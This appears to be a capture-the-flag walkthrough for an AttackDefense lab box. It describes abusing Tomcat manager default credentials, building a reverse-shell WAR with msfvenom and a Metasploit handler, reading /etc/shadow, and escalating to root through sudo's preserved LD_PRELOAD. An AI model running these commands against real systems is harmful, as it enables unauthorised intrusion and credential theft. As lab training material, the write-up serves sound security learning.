Summary

CTF X was one of the easy CTF on AttackDefense.
The goal of this is box to get three FLAGS. Getting a low privilege shell as tomcat user.
After getting the shell we enumerate and find the user password inside an archive.
Privilege Escalation to root was super simple using we see LD_PRELOAD is preserved so we can use that to get root

Enumeration

Enumerating this box with nmap we see that only port 22 and 80 is open.

As port 80 was open lets throw nikto to that and see if we find something.

Seeing that we have tomcat manager open to us with default credentials.

Lets create a reverse shell payload with msfvenom Using

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.77.154.2 LPORT=4444 -f war > shell.war

We also set up the handler for that in metasploit.

msf>use exploit multi/handler
msf>set payload java/jsp_shell_reverse_tcp
msf>set lhost 192.77.154.2
msf>set lport 4444
msf>exploit -j

And upload this to the web server.

And execute it by opening /shell

This give us a reverse shell back on the handler.
opening a shell on that we can see that we have our FLAG1 and we can read that.

Privilege Escalation to User

Enumerating the box i saw that we can read /etc/shadow file and we find the user robert. But when i try to crack that.I was unable to crack the password.

Then looking around tomcat configuration folder we find a .tar.gz file which seems to be a backup of those configurations. Extracting that we see a password for robert

Using that with ssh we get a shell as robert. with that we can read FLAG2.

Privilege Escalation to Root

Lets Enumerate the box for root.

Running sudo -l we see that we are allowed to run /bin/ls command as root. but the most interesting part here is the env_keep.
looking at the man of ld.so we find about LD_PRELOAD

LD_PRELOAD
             A list of additional, user-specified, ELF shared objects to be
             loaded before all others.  This feature can be used to selec‐
             tively override functions in other shared objects.

             The items of the list can be separated by spaces or colons,
             and there is no support for escaping either separator.  The
             objects are searched for using the rules given under DESCRIP‐
             TION.  Objects are searched for and added to the link map in
             the left-to-right order specified in the list.

             In secure-execution mode, preload pathnames containing slashes
             are ignored.  Furthermore, shared objects are preloaded only
             from the standard search directories and only if they have
             set-user-ID mode bit enabled (which is not typical).

             Within the names specified in the LD_PRELOAD list, the dynamic
             linker understands the tokens $ORIGIN, $LIB, and $PLATFORM (or
             the versions using curly braces around the names) as described
             above in Rpath token expansion.  (See also the discussion of
             quoting under the description of LD_LIBRARY_PATH.)

             There are various methods of specifying libraries to be pre‐
             loaded, and these are handled in the following order:

             (1) The LD_PRELOAD environment variable.

             (2) The --preload command-line option when invoking the
                 dynamic linker directly.

             (3) The /etc/ld.so.preload file (described below).

Googling about exploit LD_PRELOAD we find an article which shows us how to exploit it.
We follow the instruction .

We write and compile an library

Lets execute ls with sudo

sudo LD_PRELOAD=/tmp/shell.so /bin/ls

This give us a shell as root using which we can read FLAG3

and we have pwned this box with this.

💃